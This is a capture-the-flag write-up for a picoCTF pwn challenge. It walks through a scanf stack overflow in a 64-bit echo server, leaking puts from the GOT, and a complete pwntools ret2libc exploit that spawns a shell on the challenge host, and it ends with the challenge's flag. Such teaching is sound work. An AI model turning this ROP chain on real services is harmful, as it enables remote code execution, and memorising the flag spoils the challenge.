They gave us a 64-bit ELF.
file vuln
vuln: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e5dba3e6ed29e457cd104accb279e127285eecd0, not stripped
Here’s the checksec result.
checksec vuln
[*] "/picoctf/Here's_a_libc/vuln"
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
RUNPATH: b'./'
Stripped: No
I tried executing the file but it didn’t run.
./vuln
Inconsistency detected by ld.so: dl-call-libc-early-init.c: 37: _dl_call_libc_early_init: Assertion `sym != NULL' failed!
That’s a problem.
What exactly is a libc?
libc is the C standard library.
The functions we use a lot in C, such as printf, scanf, and read, are all defined there.
There are a couple of implementations of libc (glibc, musl, …).
On Linux though, when people say libc they’re usually referring to glibc.
As you can see, there’s a g prefix in glibc, similar to GCC.
The g stands for GNU, which is itself a recursive acronym for 'GNU's Not Unix'.
Long story short, GCC is used to build the executable (ELF) and glibc is the runtime environment the ELF relies on to work.
There are many versions of glibc; new versions get released twice a year.
We were also given a libc.so.6.
What is libc.so.6?
On a typical Linux system, libc.so.6 is a symbolic link that refers to the glibc shared library.
Let’s check which version of libc it uses.
It’s glibc 2.27.
strings libc.so.6 | grep "GNU"
GNU C Library (Ubuntu glibc 2.27-3ubuntu1.2) stable release version 2.27.
Compiled by GNU CC version 7.5.0.
Now that we know which version of libc picoCTF uses, we need to know which one we’re using.
Run ldd --version on your *nix machine. It’ll tell you which version of glibc you’re using.
ldd --version
ldd (Ubuntu glibc 2.39-0ubuntu8.5) 2.39
Copyright (C) 2024 Free Software Foundation, Inc.
This is free software; see the source for copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
Written by Roland McGrath and Ulrich Drepper.
I’m using 2.39.
We probably couldn’t run the ELF file due to a mismatch of glibc versions.
The RUNPATH of ./ makes the binary load the provided libc.so.6 (2.27), while the dynamic loader is still the one from my system, which is much newer: 2.39 vs 2.27.
Let’s check which OS the vuln file was built on.
You can use strings and grep to find which Linux release the ELF was built on.
strings vuln | grep "GCC:"
GCC: (Ubuntu 7.5.0-3ubuntu1~18.04) 7.5.0
It looks like it’s Ubuntu 18.04.
Why did I check where the ELF file was built?
Well, if I know the Ubuntu version, I’ll probably know the libc version as well.
Ubuntu 18.04 uses glibc 2.27.
The simplest way to solve the glibc version issue is to get hold of Ubuntu 18.04, because it uses glibc 2.27.
People usually use Docker to get hold of different versions of Ubuntu.
If it’s your first time solving this problem and you don’t know what glibc is, I don’t recommend using Dockerfiles.
You’ll be overloaded with information on Docker and Dockerfiles.
You also have to learn Docker and Dockerfiles separately, which takes some time.
However, the next time you solve a pwn challenge that requires a different glibc version, use Dockerfiles.
It’s more convenient than the approach I’m introducing here.
I’ll be using pwninit for this writeup.
pwninit is written in Rust, so you’ll have to install Rust first.
You also might have to pass the --locked flag when installing pwninit.
Otherwise it might not get installed.
Add the cargo bin directory to your PATH.
export PATH=$PATH:/home/your_name/.cargo/bin
You need to install patchelf.
sudo apt-get install patchelf
Then run pwninit in the directory where the vuln executable lives.
pwninit
bin: ./vuln
libc: ./libc.so.6
ld: ./ld-2.27.so
unstripping libc
https://launchpad.net/ubuntu/+archive/primary/+files//libc6-dbg_2.27-3ubuntu1.2_amd64.deb
warning: failed unstripping libc: failed running eu-unstrip, please install elfutils: No such file or directory (os error 2)
copying ./vuln to ./vuln_patched
running patchelf on ./vuln_patched
writing solve.py stub
Let’s run vuln_patched.
Now you can see that it works properly.
./vuln_patched
WeLcOmE To mY EcHo sErVeR!
hwkim301
HwKiM301
^C
Let’s check the file in IDA or Ghidra.
Here’s the main function.
int __fastcall __noreturn main(int argc, const char **argv, const char **envp)
{
void *v3; // rsp
char v4; // al
char *v5; // rdi
const char **v6; // [rsp+0h] [rbp-80h] BYREF
int v7; // [rsp+Ch] [rbp-74h]
char v8[40]; // [rsp+10h] [rbp-70h] BYREF
char *s; // [rsp+38h] [rbp-48h]
__int64 v10; // [rsp+40h] [rbp-40h]
unsigned __int64 v11; // [rsp+48h] [rbp-38h]
__gid_t rgid; // [rsp+54h] [rbp-2Ch]
unsigned __int64 i; // [rsp+58h] [rbp-28h]
v7 = argc;
v6 = argv;
setbuf(_bss_start, 0);
rgid = getegid();
setresgid(rgid, rgid, rgid);
v11 = 27;
strcpy(v8, "Welcome to my echo server!");
v10 = 26;
v3 = alloca(32);
s = (char *)&v6;
for ( i = 0; i < v11; ++i )
{
v4 = convert_case(v8[i], i);
s[i] = v4;
}
v5 = s;
puts(s);
while ( 1 )
do_stuff(v5);
}
The convert_case function.
__int64 __fastcall convert_case(char a1, char a2)
{
if ( a1 <= '`' || a1 > 122 )
{
if ( a1 <= 64 || a1 > 90 )
{
return (unsigned __int8)a1;
}
else if ( (a2 & 1) != 0 )
{
return (unsigned int)(unsigned __int8)a1 + 32;
}
else
{
return (unsigned __int8)a1;
}
}
else if ( (a2 & 1) != 0 )
{
return (unsigned __int8)a1;
}
else
{
return (unsigned int)(unsigned __int8)a1 - 32;
}
}
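The program takes a string as input and changes the case of its letters based on their position: letters at even (0-based) indices are uppercased and letters at odd indices are lowercased.
For example, only 'h', 'k', and 'm' (indices 0, 2, and 4) were converted in 'hwkim301'.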
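To double-check my reading of the decompiled code, here is a small Python port of convert_case. It is only a sketch that assumes ASCII input, and the echo helper is a name I made up for illustration; it is not part of the binary.

```python
def convert_case(ch: str, index: int) -> str:
    """Python port of the decompiled convert_case (assumes ASCII input)."""
    if "a" <= ch <= "z":
        # Lowercase letter: unchanged at odd indices, uppercased at even ones.
        return ch if index & 1 else chr(ord(ch) - 32)
    if "A" <= ch <= "Z":
        # Uppercase letter: lowercased at odd indices, unchanged at even ones.
        return chr(ord(ch) + 32) if index & 1 else ch
    return ch  # digits, spaces and punctuation pass through untouched


def echo(text: str) -> str:
    """Hypothetical helper: apply convert_case to every character."""
    return "".join(convert_case(c, i) for i, c in enumerate(text))


print(echo("hwkim301"))
print(echo("Welcome to my echo server!"))
```

Both the echoed input and the welcome banner from the session above come out the same way with this port.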
The do_stuff function.
int do_stuff()
{
char v0; // al
char v2; // [rsp+Fh] [rbp-81h] BYREF
char s[112]; // [rsp+10h] [rbp-80h] BYREF
__int64 v4; // [rsp+80h] [rbp-10h]
unsigned __int64 i; // [rsp+88h] [rbp-8h]
v4 = 0;
__isoc99_scanf("%[^\n]", s);
__isoc99_scanf("%c", &v2);
for ( i = 0; i <= 0x63; ++i )
{
v0 = convert_case(s[i], i);
s[i] = v0;
}
return puts(s);
}
The scanf call acts as if it were gets: the format string has no field width, so it keeps reading until a newline is received.
A BOF can be used to exploit it.
Here’s the vulnerable call.
__isoc99_scanf("%[^\n]", s);
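It should be fixed by giving the conversion a field width. The width has to be 111 rather than 112, because scanf stores a terminating null byte after the characters it reads.
scanf("%111[^\n]", s);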
The input buffer s is 112 bytes long and starts at rbp-0x80. The saved rbp sits at rbp, and the return address is right above it at rbp+8.
char s[112]; // [rsp+10h] [rbp-80h] BYREF
Therefore the offset from the input buffer to the return address is (rbp+8) - (rbp-0x80) = 0x88 = 136 bytes.
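The same arithmetic as a quick sanity check in Python. The constant names are mine; the numbers come straight from the decompiler comments in do_stuff.

```python
BUF_OFFSET_FROM_RBP = -0x80  # char s[112] starts at rbp-0x80
RET_OFFSET_FROM_RBP = 0x8    # return address sits just above the saved rbp

padding_len = RET_OFFSET_FROM_RBP - BUF_OFFSET_FROM_RBP

# Cross-check by adding up what lies between the buffer and the return
# address: s (112) + v4 (8) + i (8) + saved rbp (8).
layout_len = 112 + 8 + 8 + 8

padding = b"A" * padding_len
print(padding_len, hex(padding_len), layout_len)
```

Both ways of counting give 136, which is the padding length used in the exploit.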
Now we are able to overwrite the return address.
The problem is that the binary itself never calls execve or system, so it’s going to be hard to pop a shell.
We need to do three things in order to get a shell.
First, we need to find the libc base address.
Then, we need to return to the main function, so that we can trigger the BOF again and use the leaked libc base.
Finally, we need to call system('/bin/sh') to pop a shell.
The libc base address is literally the memory address where libc gets mapped into the process.
Even though the program doesn’t use execve or system, if we know the libc base address and the offset of system inside libc, we can call system('/bin/sh'), since libc has a whole bunch of functions defined.
To do that we’ll have to use the GOT and PLT.
They’re both used only in dynamically linked ELF files.
GOT (Global Offset Table)
The GOT is a table in the binary that stores the actual addresses of functions in shared libraries (like libc) at runtime.
When a function like puts is called, the program looks up its real address in the GOT.
PLT (Procedure Linkage Table)
The PLT is a set of stubs (small pieces of code) in the binary that jump to the addresses in the GOT.
When you call puts@plt, it uses the GOT to find where puts is in libc and jumps there.
You can use the PLT to call functions (like puts@plt) even if you don’t know their real address.
You can leak addresses from the GOT (like puts@got) to find the libc base address.
Once you have the libc base, you can calculate the address of any function in libc (like system or execve) and use it in your exploit.
Although the libc base changes every time the program runs (because of ASLR), the offsets of the functions within libc don’t.
Dynamic linking allows programs to use shared libraries (like libc) without knowing their exact memory addresses at compile time.
When a program calls a library function (like puts), it doesn’t know where that function will be in memory after the program is loaded.
When you call a function like puts, the call goes to puts@plt.
If it’s the first time calling the function, the PLT code asks the dynamic linker to find the real address of puts and stores it in the GOT.
After the first call, the PLT uses the address stored in the GOT to call the function directly (no more lookup needed).
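The lazy lookup described above can be pictured with a toy model in Python. This is a deliberately simplified sketch, not how the real PLT stubs or the dynamic linker are implemented, and every name and address in it is made up.

```python
class ToyProcess:
    """Toy model of lazy binding; all names and numbers here are made up."""

    def __init__(self, libc_base, libc_offsets):
        self.libc_base = libc_base
        self.libc_offsets = libc_offsets
        self.got = {}            # GOT: symbol name -> resolved address
        self.resolver_calls = 0  # how often the "dynamic linker" had to run

    def _resolve(self, name):
        # Stand-in for the dynamic linker: base address + offset of the symbol.
        self.resolver_calls += 1
        return self.libc_base + self.libc_offsets[name]

    def call_via_plt(self, name):
        # PLT stub: use the GOT entry, filling it in on the first call only.
        if name not in self.got:
            self.got[name] = self._resolve(name)
        return self.got[name]


proc = ToyProcess(libc_base=0x7F0000000000, libc_offsets={"puts": 0x1000})
first = proc.call_via_plt("puts")
second = proc.call_via_plt("puts")
print(hex(first), hex(second), proc.resolver_calls)
```

The point for the exploit is the state after the first call: the GOT entry holds base + offset, so reading that entry and subtracting the known offset gives back the base.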
1. Overwrite the return address.
2. Set rdi to puts@got using a pop rdi; ret gadget.
This is the GOT entry where the resolved address of puts is stored.
rdi now holds the address of puts@got.
3. Call puts@plt.
Since rdi points to puts@got, puts() will be called with puts@got as its argument.
Therefore it prints the contents of puts@got, which is the actual memory address of puts in libc.
I used puts because, unlike other functions such as setbuf or read, it actually prints output to the screen, making it easier to capture the leaked address.
4. Then we return to main.
We need to go back to the main function because the only vulnerable code, do_stuff, is called from there, and we need to trigger the overflow a second time.
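Steps 1 to 4 can be sketched as one chain of 8-byte values. To keep the snippet runnable without pwntools I pack the values with struct. The four addresses are placeholders for illustration only; in the real exploit they come from ROP(e).find_gadget, e.plt, e.got, and e.symbols.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an integer as 8 little-endian bytes, like pwntools' p64 does by default."""
    return struct.pack("<Q", value)


# Placeholder addresses, NOT read from the binary.
POP_RDI_RET = 0x400913
PUTS_GOT = 0x601018
PUTS_PLT = 0x400540
MAIN = 0x400771

stage1 = b"A" * 136         # padding up to the saved return address
stage1 += p64(POP_RDI_RET)  # step 1: return into the pop rdi; ret gadget
stage1 += p64(PUTS_GOT)     # step 2: value that gets popped into rdi
stage1 += p64(PUTS_PLT)     # step 3: puts(puts@got) prints the libc address
stage1 += p64(MAIN)         # step 4: back to main for a second overflow

print(len(stage1), stage1[136:144].hex())
```

Each entry is consumed by a ret or a pop, so the order on the stack is exactly the order of execution.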
5. Find the memory address that was leaked in libc.
Set a breakpoint in gdb and run vmmap.
You’ll see that the libc addresses all start with 0x7f…
0x00007ffff79e4000 0x00007ffff7bcb000 0x0000000000000000 r-x /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7bcb000 0x00007ffff7dcb000 0x00000000001e7000 --- /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7dcb000 0x00007ffff7dcf000 0x00000000001e7000 r-- /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7dcf000 0x00007ffff7dd1000 0x00000000001eb000 rw- /home/hwkim301/picoctf/here_is_a_libc/libc.so.6
0x00007ffff7dd1000 0x00007ffff7dd5000 0x0000000000000000 rw-
Here are the last couple of bytes after sending the payload.
b'\nAa...Ad\n0Z\x96\xfbG\x7f'
puts treats its argument as a C string, so it stops printing at the first null byte it encounters. A 64-bit user-space address usually has two null bytes at the top, so puts typically prints only the 6 significant bytes.
The bytes come out in little-endian order. For example, an address like 0x00007fabcdef1234 would be printed as \x34\x12\xef\xcd\xab\x7f.
That’s why the code reads until \x7f and takes the last 6 bytes, assuming the top two bytes were 0x0000. This is a common heuristic.
Since u64 unpacks exactly 8 bytes, we need to pad the 6 leaked bytes to 8 bytes. Padding with null bytes on the right using ljust is enough.
leak=u64(r.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
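Here is the same decoding done by hand on the tail of the output shown earlier, using struct instead of pwntools so the snippet runs on its own. I left out the elided middle part of the output; only the last bytes matter.

```python
import struct

# Tail of the received data from the run shown earlier.
received = b"Ad\n0Z\x96\xfbG\x7f"

raw = received[-6:]             # the 6 significant address bytes
padded = raw.ljust(8, b"\x00")  # restore the two missing top bytes
(leak,) = struct.unpack("<Q", padded)  # little-endian, same as u64

print(hex(leak))
```

The printable characters 0, Z, and G are just the bytes 0x30, 0x5a, and 0x47 of the address.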
6. Find the libc base
Now that we know the memory address of puts, we can calculate the libc base by subtracting its offset.
libc.address=leak-libc.symbols['puts']
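A quick way to catch a wrong leak or a wrong libc is to check that the computed base is page aligned. The sketch below uses the address decoded from the sample output above. The puts offset is a value I am assuming for illustration; the real one should always be read from libc.symbols['puts']. The helper name is also mine.

```python
PAGE_SIZE = 0x1000


def libc_base_from_leak(leaked_addr: int, symbol_offset: int) -> int:
    """Hypothetical helper: subtract the symbol offset and sanity-check the result."""
    base = leaked_addr - symbol_offset
    # Shared libraries are mapped at page boundaries, so a plausible base
    # ends in three zero hex digits.
    if base % PAGE_SIZE != 0:
        raise ValueError(f"suspicious libc base {base:#x}")
    return base


leak = 0x7F47FB965A30  # puts address decoded from the sample output
PUTS_OFFSET = 0x80A30  # assumed offset, for illustration only

base = libc_base_from_leak(leak, PUTS_OFFSET)
print(hex(base))
```

If the base does not end in 000, the leak was probably cut off or the local libc.so.6 does not match the remote one.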
7. Call system('/bin/sh') using the system function in libc.
Overwrite the return address and set rdi to the address of the '/bin/sh' string using the pop rdi; ret gadget.
Then call the system function in libc.
ELF.search is used to search for byte strings in an ELF or libc file.
Since it returns a generator, we can use next to grab the first value it yields.
What’s a generator?
A generator in Python is a special type of iterator that allows you to create an iterable sequence of values on the fly, without storing the entire sequence in memory at once.
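To make that concrete, here is a tiny generator that searches a byte string the way I use ELF.search in the exploit. It is my own stand-in, not the pwntools implementation, and the blob is made up.

```python
from typing import Iterator


def search(data: bytes, needle: bytes) -> Iterator[int]:
    """Yield every offset of needle in data, one at a time."""
    start = data.find(needle)
    while start != -1:
        yield start
        start = data.find(needle, start + 1)


# Made-up blob standing in for a library image.
blob = b"\x00sh\x00/bin/sh\x00padding/bin/sh\x00"

hits = search(blob, b"/bin/sh")
first = next(hits)   # the search only runs far enough to find this match
second = next(hits)  # and resumes from there for the next one
print(first, second)
```

For the exploit only the first match is needed, so a single next call is enough.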
The stack needs to be 16-byte aligned. I explained why it has to be aligned in the guessing_game writeup.
To make it 16-byte aligned I added a ret gadget right before the address of system.
payload2=b'A'*136
payload2+=p64(pop_rdi)
payload2+=p64(next(libc.search(b'/bin/sh')))
payload2+=p64(vuln_rop.find_gadget(['ret']).address)
payload2+=p64(libc.symbols['system'])
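The effect of the extra ret can be checked with a rough model of how rsp moves through the chain. It assumes the overwritten return-address slot sits at an address that is 8 modulo 16, which is the case for a function that was entered through a normal call. The stack address and the helper name are made up.

```python
def rsp_at_entry(ret_slot: int, chain: list) -> int:
    """Return rsp at the moment the last entry of the chain starts running.

    ret_slot is the address of the overwritten return address. Every chain
    entry, gadget address or popped value alike, moves rsp up by 8 bytes.
    """
    return ret_slot + 8 * len(chain)


# Hypothetical address of the return-address slot (8 modulo 16).
RET_SLOT = 0x7FFFFFFFE008

without_ret = ["pop rdi; ret", "address of /bin/sh", "system"]
with_ret = ["pop rdi; ret", "address of /bin/sh", "ret", "system"]

for chain in (without_ret, with_ret):
    rsp = rsp_at_entry(RET_SLOT, chain)
    # After a normal call, rsp is 8 modulo 16 at function entry.
    print(len(chain), hex(rsp), rsp % 16 == 8)
```

Without the ret, system starts with rsp at 0 modulo 16, which is off by 8 from what a called function expects; the single 8-byte ret entry shifts it back.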
Here’s the complete code.
Exploit
from pwn import *
r = remote("mercury.picoctf.net", 1774)
e = ELF("./vuln")
libc = ELF("./libc.so.6")
vuln_rop = ROP(e)
pop_rdi = vuln_rop.find_gadget(["pop rdi", "ret"]).address
puts_plt = e.plt["puts"]
puts_got = e.got["puts"]
main = e.symbols["main"]
payload = b"A" * 136
payload += p64(pop_rdi)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main)
r.sendlineafter(b"WeLcOmE To mY EcHo sErVeR!", payload)
leak = u64(r.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
log.info(f"{hex(leak)}")
libc.address = leak - libc.symbols["puts"]
log.info(f"libc base: {hex(libc.address)}")
payload2 = b"A" * 136
payload2 += p64(pop_rdi)
payload2 += p64(next(libc.search(b"/bin/sh")))
payload2 += p64(vuln_rop.find_gadget(["ret"]).address)
payload2 += p64(libc.symbols["system"])
r.sendline(payload2)
r.interactive()
The flag is picoCTF{1_<3_sm4sh_st4cking_f2ac531bbb3a68ed}.
My favorite write up is this one. It’s pretty detailed.